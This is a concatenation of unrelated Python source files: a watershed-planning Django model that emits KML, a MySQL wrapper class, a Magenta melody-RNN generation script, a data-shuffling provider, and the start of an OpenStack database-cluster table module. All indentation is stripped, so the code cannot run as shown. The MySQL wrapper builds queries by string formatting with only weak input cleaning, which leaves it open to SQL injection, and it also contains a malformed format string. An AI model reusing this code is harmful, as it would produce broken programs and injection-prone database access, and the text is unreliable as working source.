# colors are ABGR
colors = [
'aa0000ff',
'aaff0000',
'aa00ffff',
'aaff00ff',
]
return colors[self.pk % len(colors)]
@property
def kml_done(self):
key = "watershed_kmldone_%s_%s" % (self.uid, slugify(self.date_modified))
kmlcache, created = KmlCache.objects.get_or_create(key=key)
kml = kmlcache.kml_text
if not created and kml:
logger.warn("%s ... kml cache found" % key)
return kml
logger.warn("%s ... NO kml cache found ... seeding" % key)
ob = json.loads(self.output_best)
wids = [int(x.strip()) for x in ob['best']]
puc = json.loads(self.output_pu_count)
method = "best"
#method = "all"
if method == "best":
wshds = PlanningUnit.objects.filter(pk__in=wids)
elif method == "all":
wshds = PlanningUnit.objects.all()
kmls = []
color = self.color
#color = "cc%02X%02X%02X" % (random.randint(0,255),random.randint(0,255),random.randint(0,255))
for ws in wshds:
try:
hits = puc[str(ws.pk)]
except KeyError:
hits = 0
if method == "all":
numruns = settings.MARXAN_NUMREPS
prop = float(hits)/numruns
scale = (1.4 * prop * prop)
if scale > 0 and scale < 0.5:
scale = 0.5
desc = "<description>Included in %s out of %s runs.</description>" % (hits, numruns)
else:
prop = 1.0
scale = 1.2
desc = ""
if prop > 0:
kmls.append( """
<Style id="style_%s">
<IconStyle>
<color>%s</color>
<scale>%s</scale>
<Icon>
<href>http://maps.google.com/mapfiles/kml/shapes/shaded_dot.png</href>
</Icon>
</IconStyle>
<LabelStyle>
<color>0000ffaa</color>
<scale>0.1</scale>
</LabelStyle>
</Style>
<Placemark id="huc_%s">
<visibility>1</visibility>
<name>%s</name>
%s
<styleUrl>style_%s</styleUrl>
%s
</Placemark>
""" % (ws.fid, color, scale, ws.fid, ws.name, desc, ws.fid, asKml(ws.geometry.point_on_surface)))
fullkml = """%s
<Folder id='%s'>
<name>%s</name>
%s
</Folder>""" % (self.kml_style,
self.uid,
escape(self.name),
'\n'.join(kmls))
kmlcache.kml_text = fullkml
kmlcache.save()
return fullkml
@property
def kml_working(self):
code = self.status_code
if code == 3:
txt = "completed"
elif code == 2:
txt = "in progress"
elif code == 1:
txt = "in queue"
elif code == 0:
txt = "error occured"
else:
txt = "status unknown"
return """
<Placemark id="%s">
<visibility>0</visibility>
<name>%s (%s)</name>
</Placemark>
""" % (self.uid, escape(self.name), txt)
@property
def kml_style(self):
return """
<Style id="selected-watersheds">
<IconStyle>
<color>ffffffff</color>
<colorMode>normal</colorMode>
<scale>0.9</scale>
<Icon> <href>http://maps.google.com/mapfiles/kml/paddle/wht-blank.png</href> </Icon>
</IconStyle>
<LabelStyle>
<color>ffffffff</color>
<scale>0.8</scale>
</LabelStyle>
<PolyStyle>
<color>7766ffff</color>
</PolyStyle>
</Style>
"""
class Options:
form = 'seak.forms.ScenarioForm'
verbose_name = 'Prioritization Scenario'
show_template = 'nplcc/show.html'
form_template = 'nplcc/form.html'
form_context = {
'cfs': ConservationFeature.objects.all().order_by('level1'),
'defined_geographies': DefinedGeography.objects.all(),
'costs': Cost.objects.all(),
}
icon_url = 'common/images/watershed.png'
links = (
alternate('Shapefile',
'seak.views.watershed_shapefile',
select='single multiple',
type='application/zip',
),
alternate('Input Files',
'seak.views.watershed_marxan',
select='single',
type='application/zip',
),
)
# Post-delete hooks to remove the marxan files
@receiver(post_delete, sender=Scenario)
def _scenario_delete(sender, instance, **kwargs):
if os.path.exists(instance.outdir):
try:
shutil.rmtree(instance.outdir)
logger.debug("Deleting %s at %s" % (instance.uid, instance.outdir))
except OSError:
logger.debug("Can't deleting %s; forging ahead anyway..." % (instance.uid,))
@register
class Folder(FeatureCollection):
description = models.TextField(default="", null=True, blank=True)
class Options:
verbose_name = 'Folder'
valid_children = (
'seak.models.Folder',
'seak.models.Scenario',
)
form = 'seak.forms.FolderForm'
show_template = 'folder/show.html'
icon_url = 'common/images/folder.png'
class PlanningUnitShapes(models.Model):
pu = models.ForeignKey(PlanningUnit)
stamp = models.FloatField()
bests = models.IntegerField(default=0)
hits = models.IntegerField(default=0)
fid = models.IntegerField(null=True)
name = models.CharField(max_length=99, null=True)
geometry = models.MultiPolygonField(srid=settings.GEOMETRY_DB_SRID,
null=True, blank=True, verbose_name="Planning Unit Geometry")
|
|
import MySQLdb
from cxparams import CXParams as CXP
import time
import functools
import array
import sys
import pdb
import cPickle
import re
# Credit here to M. Newville (GSECARS) for SimpleTable and SimpleDB
def clean_input(x, maxlen=None):
"""clean input, forcing it to be a string, with comments stripped,
and guarding against extra sql statements"""
if not isinstance(x, (unicode, str)):
x = str(x)
if maxlen is None:
maxlen = 1024
if len(x) > maxlen:
x = x[:maxlen-1]
x = x.replace('#', r'\#')
eol = x.find(';')
if eol > -1:
x = x[:eol]
return x.strip()
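# `safe_string` is used by SimpleTable.select_where() and SimpleTable.update()
# below but is neither defined nor imported in this module; this is a minimal
# stand-in (assumption: bare strings get single-quoted, everything else passes
# through unchanged) so those methods remain runnable.
def safe_string(x):
    "quote a bare string value for use in a SQL statement; pass other values through"
    if isinstance(x, (unicode, str)):
        if not (x.startswith("'") or x.startswith('"')):
            return "'%s'" % x
    return x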
class SimpleDB:
def __init__(self, user=CXP.db.dbuser, dbname=CXP.db.dbname, passwd=CXP.db.dbpass, host=CXP.db.dbhost,
autocommit=1):
self.conn = MySQLdb.connect(user=user, db=dbname, passwd=passwd, host=host)
self.cursor = self.conn.cursor(cursorclass=MySQLdb.cursors.DictCursor)
self.set_autocommit(autocommit)
self.dbname = dbname
# keep connection parameters; grant() and the error path in get_cursor() use them
self.user = user
self.passwd = passwd
self.host = host
self.tables = []
self.read_table_info()
def __repr__(self):
return "<SimpleDB name=%s>" % (self.dbname)
def set_autocommit(self, commit=1):
self.cursor.execute("set AUTOCOMMIT=%i" % commit)
def _normalize_dict(self, indict):
""" internal 'normalization' of query outputs,
converting unicode to str and array data to lists"""
t = {}
if (indict == None):
return t
for k, v in indict.items():
key = k.lower()
val = v
if isinstance(v, array.array):
if v.typecode == 'c':
val = v.tostring()
else:
val = v.tolist()
elif isinstance(v, unicode):
val = str(v)
t[key] = val
return t
def get_cursor(self, dbconn=None):
" get a DB cursor, possibly getting a new one from the Connection pool"
if self.conn is not None:
if self.cursor is None:
self.cursor = self.conn.cursor(cursorclass=MySQLdb.cursors.DictCursor)
return self.cursor
if self.conn is None:
CXP.log("Could not start MySQL on %s for database %s" %
(self.host, self.dbname), status='fatal')
raise IOError("no database connection to %s" % self.dbname)
def close(self):
self.conn.close()
def use(self, dbname):
self.execute("use %s" % dbname)
def read_table_info(self):
" use database, populate initial list of tables "
self.table_list = []
self.tables = {}
x = self.exec_fetch("show TABLES")
self.table_list = [i.values()[0] for i in x]
for i in self.table_list:
self.tables[i] = SimpleTable(i, db=self)
def __execute(self, q):
"""internal execution of a single query -- needs a valid cursor!"""
if self.cursor is None:
print "SimpleDB.__execute -- no cursor: {}".format(q)
sys.exit(1)
n = 0
while n < 50:
n = n + 1
try:
return self.cursor.execute(q)
except:
time.sleep(0.010)
print "Query Failed: {} ".format(q)
return None
def execute(self, q):
"execute a single sql command string or a tuple or list command strings"
ret = None
if isinstance(q, str):
ret = self.__execute(q)
elif isinstance(q, (list, tuple)):
ret = [self.__execute(i) for i in q]
else:
self.write("Error: could not execute %s" % str(q))
return ret
def exec_fetch(self, q):
"execute + fetchall"
self.get_cursor()
self.__execute(q)
ret = self.fetchall()
return ret
def source_file(self, file=None, report=100):
""" execute a file of sql commands """
try:
f = open(file)
lines = f.readlines()
count = 0
cmds = []
for x in lines:
if not x.startswith('#'):
x = x[:-1].strip()
if x.endswith(';'):
cmds.append(x[:-1])
sql = "".join(cmds)
self.__execute(sql)
cmds = []
else:
cmds.append(x)
count = count +1
if (report>0 and (count % report == 0)):
print "{:d}} / {:d} ".format(count, len(lines))
f.close()
except:
print "Could not source source_file {}".format(file)
def create_and_use(self, dbname):
"create and use a database. Use with caution!"
self.__execute("drop database if exists %s" % dbname)
self.__execute("create database %s" % dbname)
self.use(dbname)
def fetchall(self):
"return all rows from most recent query -- needs valid cursor"
if self.cursor is None:
return ()
r = [self._normalize_dict(i) for i in self.cursor.fetchall()]
return tuple(r)
def exec_fetchone(self, q):
" execute + fetchone"
self.__execute(q)
ret = self.fetchone()
return ret
def fetchone(self):
"return next row from most recent query -- needs valid cursor"
if self.cursor is None:
return {}
return self._normalize_dict(self.cursor.fetchone())
def grant(self, db=None, user=None, passwd=None, host=None, priv=None, grant=False):
"""grant permissions """
if db is None:
db = self.dbname
if user is None:
user = self.user
if passwd is None:
passwd = self.passwd
if host is None:
host = self.host
if priv is None:
priv = 'all privileges'
priv = clean_input(priv)
grant_opt =''
if grant:
grant_opt = "with GRANT OPTION"
cmd = "grant %s on %s.* to %s@%s identified by '%s' %s"
self.__execute(cmd % (priv, db, user, host, passwd, grant_opt))
def sql_exec(self, sql):
self.execute(sql)
class SimpleTable:
""" simple MySQL table wrapper class.
Note: a table must have an ID column"""
def __init__(self, table=None, db=None):
self.db = db
if db is None:
CXP.log.error("Warning SimpleTable needs a database connection.")
return None
self._name = None
if table in self.db.table_list:
self._name = table
else:
table = table.lower()
if (table in self.db.table_list):
self._name = table
else:
CXP.log.error("Table %s not available in %s " % (table,db))
return None
self.fieldtypes = {}
ret = self.db.exec_fetch("describe %s" % self._name)
for j in ret:
field = j['field'].lower()
vtype = 'str'
ftype = j['type'].lower()
if ftype.startswith('int'): vtype = 'int'
if ftype.startswith('double'): vtype = 'double'
if ftype.startswith('float'): vtype = 'float'
if ftype.startswith('blob'): vtype = 'blob'
if ftype.startswith('tinyint(1)'): vtype='bool'
self.fieldtypes[field] = vtype
def update_fieldtypes(self):
self.fieldtypes = {}
ret = self.db.exec_fetch("describe %s" % self._name)
for j in ret:
field = j['field'].lower()
vtype = 'str'
ftype = j['type'].lower()
if ftype.startswith('int'): vtype = 'int'
if ftype.startswith('double'): vtype = 'double'
if ftype.startswith('float'): vtype = 'float'
if ftype.startswith('blob'): vtype = 'blob'
if ftype.startswith('tinyint(1)'): vtype = 'bool'
self.fieldtypes[field] = vtype
def check_args(self,**args):
""" check that the keys of the passed args are all available
as table columns.
returns 0 on failure, 1 on success """
return self.check_columns(args.keys())
def check_columns(self,l):
""" check that the list of args are all available as table columns
returns 0 on failure, 1 on success
"""
for i in l:
if not self.fieldtypes.has_key(i.lower()): return False
return True
def select_all(self):
return self.select_where()
def select_where(self,**args):
"""check for a table row, and return matches"""
if (self.check_args(**args)):
q = "select * from %s where 1=1" % (self._name)
for k,v in args.items():
k = clean_input(k)
v = safe_string(v)
q = "%s and %s=%s" % (q,k,v)
# print 'S WHERE ', q
return self.db.exec_fetch(q)
return 0
def select(self,vals='*', where='1=1'):
"""check for a table row, and return matches"""
q= "select %s from %s where %s" % (vals, self._name, where)
return self.db.exec_fetch(q)
def select_one(self,vals='*', where='1=1'):
"""check for a table row, and return matches"""
q= "select %s from %s where %s" % (vals, self._name, where)
return self.db.exec_fetchone(q)
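# Illustrative usage (assumed table/column names):
#   t = db.tables['recon_id']
#   t.select_where(id=1)             # -> "select * from recon_id where 1=1 and id=1"
#   t.select(vals='max(id) as id')   # -> "select max(id) as id from recon_id where 1=1"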
def update(self, where='1=1', **kw):
"""update table rows with keyword column=value arguments and a where clause:
table.update(where="y='a'", x=1)
translates to
update TABLE set x=1 where y='a'
"""
if where is None or not kw:
self.db.write("update must give a 'where' clause and column=value arguments")
return
try:
s = []
for k,v in kw.items():
if self.fieldtypes.has_key(k):
ftype = self.fieldtypes[k]
k = clean_input(k)
if ftype == 'str':
s.append("%s=%s" % (k,safe_string(v)))
elif ftype in ('double','float'):
s.append("%s=%f" % (k,float(v)))
elif ftype == 'int':
s.append("%s=%i" % (k,int(v)))
s = ','.join(s)
q = "update %s set %s where %s" % (self._name,s,where)
# print 'UPDATE Q ', q
self.db.execute(q)
except:
self.db.write('update failed: %s' % q)
def insert(self, **args):
"add a new table row "
q = []
for k,v in args.items():
q.append("%s=%s" % (k, v))
s = ','.join(q)
qu = "insert into %s set %s" % (self._name, s)
self.db.execute(qu)
def insert_on_duplicate_key_update(self, primary={'id': 0}, update={}):
"insert a row or update a row if a unique key exists"
q = []
ks = []
vs = []
for k, v in primary.items():
ftype = self.fieldtypes[k.lower()]
field = clean_input(k.lower())
if ftype in ['int', 'double']:
v = str(v)
elif ftype == 'bool':
v = str(int(v))
elif ftype == 'str':
v = '"{}"'.format(v)
elif ftype == 'blob':
v = '"{}"'.format(cPickle.dumps(v))
ks.append(field)
vs.append(v)
for k, v in update.items():
ftype = self.fieldtypes[k.lower()]
field = clean_input(k.lower())
if ftype in ['int', 'double']:
v=str(v)
elif ftype =='bool':
v=str(int(v))
elif ftype == 'str':
v='"{}"'.format(v)
elif ftype == 'blob':
v='"{}"'.format(cPickle.dumps(v))
ks.append(field)
vs.append(v)
q.append("%s=%s" % (field, v))
s1 = ','.join(ks)
s2 = ','.join(vs)
s = ','.join(q)
qu = 'insert into %s (%s) values (%s) on duplicate key update %s' % (self._name, s1, s2, s)
self.db.execute(qu)
def get_next_id(self, name='unknown'):
"""
Get a unique id for the current reconstruction attempt.
"""
q = 'insert into recon_id (location) values ("{:s}")'
self.db.sql_exec(q.format(name, time.time()))
q= "select max(id) as id from recon_id"
rid = self.db.exec_fetchone(q)['id']
if rid is not None:
return int(rid)
else:
return 1
def db_insert(self):
def db_insert_decorator(func):
@functools.wraps(func)
def db_wrapper(*args, **kwargs):
#pre
result = func(*args, **kwargs)
#post
return result
return db_wrapper
return db_insert_decorator
def add_column(self, col_name='col_error', var_type='double', default_value='0'):
q = 'alter table {} add {} {}'
if default_value == '':
def_str = ' default null'
else:
def_str = ' default {}'.format(default_value)
self.db.execute(q.format(self._name, col_name, var_type) + def_str)
def __repr__(self):
""" shown when printing instance:
>>>p = Table()
>>>print p
"""
return "<MyTable name=%s>" % (self._name)
def set_defaults(self):
"""
Checks table for columns without a default value and gives
them one.
"""
self.db.execute('describe {:s}'.format(self._name))
cols = self.db.fetchall()
alter = 'alter table {:s} alter {:s} set default {:s}'
for col in cols:
if col['default'] is None:
if re.match('^int|double|tiny*', col['type']):
CXP.log.warning('Setting default value of {:} to 0'.format(col['field']))
self.db.sql_exec(alter.format(self._name, col['field'], str(0)))
elif re.match('^varchar*', col['type']):
CXP.log.warning('Setting default value of {:} to ""'.format(col['field']))
self.db.sql_exec(alter.format(self._name, col['field'], '""'))
time.sleep(0.02)
|
|
# Copyright 2019 The Magenta Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Generate melodies from a trained checkpoint of a melody RNN model."""
import ast
import os
import time
import magenta
from magenta.models.melody_rnn import melody_rnn_config_flags
from magenta.models.melody_rnn import melody_rnn_model
from magenta.models.melody_rnn import melody_rnn_sequence_generator
from magenta.protobuf import generator_pb2
from magenta.protobuf import music_pb2
import tensorflow as tf
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_string(
'run_dir', None,
'Path to the directory where the latest checkpoint will be loaded from.')
tf.app.flags.DEFINE_string(
'checkpoint_file', None,
'Path to the checkpoint file. run_dir will take priority over this flag.')
tf.app.flags.DEFINE_string(
'bundle_file', None,
'Path to the bundle file. If specified, this will take priority over '
'run_dir and checkpoint_file, unless save_generator_bundle is True, in '
'which case both this flag and either run_dir or checkpoint_file are '
'required')
tf.app.flags.DEFINE_boolean(
'save_generator_bundle', False,
'If true, instead of generating a sequence, will save this generator as a '
'bundle file in the location specified by the bundle_file flag')
tf.app.flags.DEFINE_string(
'bundle_description', None,
'A short, human-readable text description of the bundle (e.g., training '
'data, hyper parameters, etc.).')
tf.app.flags.DEFINE_string(
'output_dir', '/tmp/melody_rnn/generated',
'The directory where MIDI files will be saved to.')
tf.app.flags.DEFINE_integer(
'num_outputs', 10,
'The number of melodies to generate. One MIDI file will be created for '
'each.')
tf.app.flags.DEFINE_integer(
'num_steps', 128,
'The total number of steps the generated melodies should be, priming '
'melody length + generated steps. Each step is a 16th of a bar.')
tf.app.flags.DEFINE_string(
'primer_melody', '',
'A string representation of a Python list of '
'magenta.music.Melody event values. For example: '
'"[60, -2, 60, -2, 67, -2, 67, -2]". If specified, this melody will be '
'used as the priming melody. If a priming melody is not specified, '
'melodies will be generated from scratch.')
tf.app.flags.DEFINE_string(
'primer_midi', '',
'The path to a MIDI file containing a melody that will be used as a '
'priming melody. If a primer melody is not specified, melodies will be '
'generated from scratch.')
tf.app.flags.DEFINE_float(
'qpm', None,
'The quarters per minute to play generated output at. If a primer MIDI is '
'given, the qpm from that will override this flag. If qpm is None, qpm '
'will default to 120.')
tf.app.flags.DEFINE_float(
'temperature', 1.0,
'The randomness of the generated melodies. 1.0 uses the unaltered softmax '
'probabilities, greater than 1.0 makes melodies more random, less than 1.0 '
'makes melodies less random.')
tf.app.flags.DEFINE_integer(
'beam_size', 1,
'The beam size to use for beam search when generating melodies.')
tf.app.flags.DEFINE_integer(
'branch_factor', 1,
'The branch factor to use for beam search when generating melodies.')
tf.app.flags.DEFINE_integer(
'steps_per_iteration', 1,
'The number of melody steps to take per beam search iteration.')
tf.app.flags.DEFINE_string(
'log', 'INFO',
'The threshold for what messages will be logged DEBUG, INFO, WARN, ERROR, '
'or FATAL.')
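# Illustrative invocation (the `melody_rnn_generate` command name is assumed
# from the console_entry_point at the bottom of this file; paths are
# placeholders, and only flags defined above are used):
#
#   melody_rnn_generate \
#     --bundle_file=/path/to/some_melody_rnn.mag \
#     --output_dir=/tmp/melody_rnn/generated \
#     --num_outputs=10 \
#     --num_steps=128 \
#     --primer_melody="[60]"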
def get_checkpoint():
"""Get the training dir or checkpoint path to be used by the model."""
if ((FLAGS.run_dir or FLAGS.checkpoint_file) and
FLAGS.bundle_file and not FLAGS.save_generator_bundle):
raise magenta.music.SequenceGeneratorError(
'Cannot specify both bundle_file and run_dir or checkpoint_file')
if FLAGS.run_dir:
train_dir = os.path.join(os.path.expanduser(FLAGS.run_dir), 'train')
return train_dir
elif FLAGS.checkpoint_file:
return os.path.expanduser(FLAGS.checkpoint_file)
else:
return None
def get_bundle():
"""Returns a generator_pb2.GeneratorBundle object based read from bundle_file.
Returns:
Either a generator_pb2.GeneratorBundle or None if the bundle_file flag is
not set or the save_generator_bundle flag is set.
"""
if FLAGS.save_generator_bundle:
return None
if FLAGS.bundle_file is None:
return None
bundle_file = os.path.expanduser(FLAGS.bundle_file)
return magenta.music.read_bundle_file(bundle_file)
def run_with_flags(generator):
"""Generates melodies and saves them as MIDI files.
Uses the options specified by the flags defined in this module.
Args:
generator: The MelodyRnnSequenceGenerator to use for generation.
"""
if not FLAGS.output_dir:
tf.logging.fatal('--output_dir required')
return
FLAGS.output_dir = os.path.expanduser(FLAGS.output_dir)
primer_midi = None
if FLAGS.primer_midi:
primer_midi = os.path.expanduser(FLAGS.primer_midi)
if not tf.gfile.Exists(FLAGS.output_dir):
tf.gfile.MakeDirs(FLAGS.output_dir)
primer_sequence = None
qpm = FLAGS.qpm if FLAGS.qpm else magenta.music.DEFAULT_QUARTERS_PER_MINUTE
if FLAGS.primer_melody:
primer_melody = magenta.music.Melody(ast.literal_eval(FLAGS.primer_melody))
primer_sequence = primer_melody.to_sequence(qpm=qpm)
elif primer_midi:
primer_sequence = magenta.music.midi_file_to_sequence_proto(primer_midi)
if primer_sequence.tempos and primer_sequence.tempos[0].qpm:
qpm = primer_sequence.tempos[0].qpm
else:
tf.logging.warning(
'No priming sequence specified. Defaulting to a single middle C.')
primer_melody = magenta.music.Melody([60])
primer_sequence = primer_melody.to_sequence(qpm=qpm)
# Derive the total number of seconds to generate based on the QPM of the
# priming sequence and the num_steps flag.
seconds_per_step = 60.0 / qpm / generator.steps_per_quarter
total_seconds = FLAGS.num_steps * seconds_per_step
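# e.g. (illustrative): at qpm=120 with steps_per_quarter=4, seconds_per_step =
# 60.0 / 120 / 4 = 0.125, so the default num_steps=128 yields 16 seconds.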
# Specify start/stop time for generation based on starting generation at the
# end of the priming sequence and continuing until the sequence is num_steps
# long.
generator_options = generator_pb2.GeneratorOptions()
if primer_sequence:
input_sequence = primer_sequence
# Set the start time to begin on the next step after the last note ends.
if primer_sequence.notes:
last_end_time = max(n.end_time for n in primer_sequence.notes)
else:
last_end_time = 0
generate_section = generator_options.generate_sections.add(
start_time=last_end_time + seconds_per_step,
end_time=total_seconds)
if generate_section.start_time >= generate_section.end_time:
tf.logging.fatal(
'Priming sequence is longer than the total number of steps '
'requested: Priming sequence length: %s, Generation length '
'requested: %s',
generate_section.start_time, total_seconds)
return
else:
input_sequence = music_pb2.NoteSequence()
input_sequence.tempos.add().qpm = qpm
generate_section = generator_options.generate_sections.add(
start_time=0,
end_time=total_seconds)
generator_options.args['temperature'].float_value = FLAGS.temperature
generator_options.args['beam_size'].int_value = FLAGS.beam_size
generator_options.args['branch_factor'].int_value = FLAGS.branch_factor
generator_options.args[
'steps_per_iteration'].int_value = FLAGS.steps_per_iteration
tf.logging.debug('input_sequence: %s', input_sequence)
tf.logging.debug('generator_options: %s', generator_options)
# Make the generate request num_outputs times and save the output as midi
# files.
date_and_time = time.strftime('%Y-%m-%d_%H%M%S')
digits = len(str(FLAGS.num_outputs))
for i in range(FLAGS.num_outputs):
generated_sequence = generator.generate(input_sequence, generator_options)
midi_filename = '%s_%s.mid' % (date_and_time, str(i + 1).zfill(digits))
midi_path = os.path.join(FLAGS.output_dir, midi_filename)
magenta.music.sequence_proto_to_midi_file(generated_sequence, midi_path)
tf.logging.info('Wrote %d MIDI files to %s',
FLAGS.num_outputs, FLAGS.output_dir)
def main(unused_argv):
"""Saves bundle or runs generator based on flags."""
tf.logging.set_verbosity(FLAGS.log)
bundle = get_bundle()
if bundle:
config_id = bundle.generator_details.id
config = melody_rnn_model.default_configs[config_id]
config.hparams.parse(FLAGS.hparams)
else:
config = melody_rnn_config_flags.config_from_flags()
generator = melody_rnn_sequence_generator.MelodyRnnSequenceGenerator(
model=melody_rnn_model.MelodyRnnModel(config),
details=config.details,
steps_per_quarter=config.steps_per_quarter,
checkpoint=get_checkpoint(),
bundle=bundle)
if FLAGS.save_generator_bundle:
bundle_filename = os.path.expanduser(FLAGS.bundle_file)
if FLAGS.bundle_description is None:
tf.logging.warning('No bundle description provided.')
tf.logging.info('Saving generator bundle to %s', bundle_filename)
generator.create_bundle_file(bundle_filename, FLAGS.bundle_description)
else:
run_with_flags(generator)
def console_entry_point():
tf.app.run(main)
if __name__ == '__main__':
console_entry_point()
|
|
"""
Copyright 2016 Deepgram
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import logging
import numpy
from . import Provider
from ..utils import DisableLogging
logger = logging.getLogger(__name__)
###############################################################################
class ShuffleProvider(Provider): \
# pylint: disable=too-few-public-methods,abstract-method
""" Data provider that can shuffle data in-sync with support data sources.
# Expected behavior
This extends the list of expected behaviors from the `Provider` base
class.
- Because Providers create new Source iterators for each epoch, and
because each epoch ends whenever any Source iterator terminates (that
is, once the shortest dataset terminates), Providers only shuffle
Sources once every epoch, and can do so at the beginning of each
epoch. There is no need for Sources to indicate when they would like
to be shuffled.
- There are two possibilities when applying shuffles:
1. Past shuffles that have been applied to Sources are persistent,
affecting the Source's data in a non-reversible way (as far as
the Source is concerned).
2. Shuffles are temporary, and once the Source iterator is
recreated (between epochs), it can be assumed that the data---
prior to another shuffle---is in the same, original ordering.
These distinctions are transparent to the provider, which merely
needs to provide new shuffle indices. But it is possible for the
provider to help orchestrate these (e.g., by providing reverse
permutations after each epoch).
Now, all Sources must be Shuffleable in order to use shuffling. This
means that even mixed finite/infinite Sources must support the
Shuffleable protocol. Sources that stream data samples (e.g.,
real-time data augmentation generators) could possibly be simplified
if the shuffle is assumed to be "new" after each epoch. Indeed, there
may be performance benefits (cache-coherency) from making certain
assumptions about how the shuffle "ought" to be applied.
Despite this, it would be imprudent to decide that Shuffleable
sources must operate under any particular set of assumptions about
how they store or organize data. Therefore, we opt for (1) and assume
that shuffles are persistent, and leave it to the individual sources
to decide how to combine multiple shuffles.
"""
###########################################################################
def __init__(self, *args, randomize=True, sort_by=None, sortagrad=None,
shuffle_after=None, reverse=None, **kwargs):
""" Create a new data provider that can shuffle shuffleable sources.
# Arguments
sources: dict or list. If this is a list, then it is a list of
Sources. If this is a dictionary, its values are Sources and
its keys are string names that are used by the training process
to determine which nodes in the network should receive which
information.
"""
super().__init__(*args, **kwargs)
if randomize:
for i, source in enumerate(self.sources):
if not source.can_shuffle():
raise ValueError('All data sources must be shuffleable '
'for the provider to be able to shuffle them. Source '
'"{}" does not seem to match: {}'.format(
'unknown' if self.keys is None else self.keys[i],
source))
if randomize is True:
if self.entries <= 0:
raise ValueError('Must know how long our shuffleable '
'sources are in order to shuffle them, but all '
'sources seem to be infinite. If this is the case, '
'then set `randomize` to an integer in the '
'Provider\'s constructor, or disable shuffling '
'entirely by setting `randomize` to False.')
self._shuffle_len = self.entries
elif isinstance(randomize, int):
self._shuffle_len = randomize
else:
raise ValueError('`randomize` must be True/False or an '
'integer, but we received: {}'.format(randomize))
self.randomize = True
else:
self.randomize = False
self.reverse = reverse
if sortagrad:
if sort_by or shuffle_after:
raise ValueError('"sortagrad" cannot be used with "sort_by" '
'or "shuffle_after". That is because sortagrad=X is '
'equivalent to sort_by=X, shuffle_after=1.')
sort_by = sortagrad
shuffle_after = 1
if sort_by:
if self.keys is None:
raise ValueError('Cannot use "sort_by" with unnamed sources.')
try:
sort_data = self.sources[self.keys.index(sort_by)]
except ValueError:
raise ValueError('Could not find the "sort_by" key "{}" in '
'list of available sources: {}'
.format(sort_by, ', '.join(self.keys)))
else:
sort_data = None
self.sort_by = sort_by
self.sort_data = sort_data
self.is_sorted = False
self.shuffle_after = shuffle_after or 0
###########################################################################
def add_source(self, source, name=None):
""" Adds a new data source to an existing provider.
"""
if self.randomize:
if not source.can_shuffle():
raise ValueError('Cannot add a non-shuffleable source to an '
'already shuffled provider.')
super().add_source(source, name=name)
if self.randomize is True:
self._shuffle_len = self.entries
###########################################################################
def pre_iter(self):
""" Pre-iteration hook.
This is our opportunity to shuffle the data sources.
"""
super().pre_iter()
if self.randomize:
if self.shuffle_after > 0:
self.shuffle_after -= 1
if self.sort_by and not self.is_sorted:
logger.info('Sorting data by key %s...', self.sort_by)
n = numpy.empty(
(len(self.sort_data), ) + self.sort_data.shape()
)
if self.sort_data.is_derived():
from . import BatchProvider
from ..utils import parallelize
subset = self.get_requirements_for_source(
self.sort_by,
self.sort_data
)
with DisableLogging():
provider = BatchProvider(
sources=subset,
batch_size=1024,
randomize=False
)
start = 0
for batch in parallelize(provider):
batch = batch[self.sort_by]
n[start:start+len(batch)] = batch[:]
start += len(batch)
else:
start = 0
for batch in self.sort_data:
n[start:start+len(batch)] = batch[:]
start += len(batch)
indices = numpy.argsort(n, axis=0)
if indices.ndim > 1:
indices = numpy.array(
[numpy.ravel(x)[0] for x in indices]
)
if self.reverse:
logger.info('Reverse shuffling.')
indices = indices[::-1]
for source in self.sources:
source.shuffle(indices)
self.is_sorted = True
else:
logger.debug('Suppressing shuffle...')
else:
logger.debug('Shuffling...')
indices = numpy.random.permutation(self._shuffle_len)
for source in self.sources:
source.shuffle(indices)
### EOF.EOF.EOF.EOF.EOF.EOF.EOF.EOF.EOF.EOF.EOF.EOF.EOF.EOF.EOF.EOF.EOF.EOF.EOF
|
|
# Copyright (c) 2014 eBay Software Foundation
# Copyright 2015 HP Software, LLC
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
from django.core import urlresolvers
from django import shortcuts
from django.template.defaultfilters import title # noqa
from django.utils.translation import ugettext_lazy as _
from django.utils.translation import ungettext_lazy
from horizon import messages
from horizon import tables
from horizon.templatetags import sizeformat
from horizon.utils import filters
from horizon.utils import functions
from horizon.utils import memoized
from stashboard import api
from stashboard.content.database_clusters import cluster_manager
from stashboard.content.databases import db_capability
LOG = logging.getLogger(__name__)
ACTIVE_STATES = ("ACTIVE",)
class DeleteCluster(tables.BatchAction):
name = "delete"
icon = "remove"
classes = ('btn-danger',)
help_text = _("Deleted cluster is not recoverable.")
@staticmethod
def action_present(count):
return ungettext_lazy(
u"Delete Cluster",
u"Delete Clusters",
count
)
@staticmethod
def action_past(count):
return ungettext_lazy(
u"Scheduled deletion of Cluster",
u"Scheduled deletion of Clusters",
count
)
def action(self, request, obj_id):
api.trove.cluster_delete(request, obj_id)
class LaunchLink(tables.LinkAction):
name = "launch"
verbose_name = _("Launch Cluster")
url = "horizon:project:database_clusters:launch"
classes = ("btn-launch", "ajax-modal")
icon = "cloud-upload"
class ClusterGrow(tables.LinkAction):
name = "cluster_grow"
verbose_name = _("Grow Cluster")
url = "horizon:project:database_clusters:cluster_grow_details"
def allowed(self, request, cluster=None):
if (cluster and cluster.task["name"] == 'NONE' and
db_capability.can_modify_cluster(cluster.datastore['type'])):
return True
return False
class ClusterShrink(tables.LinkAction):
name = "cluster_shrink"
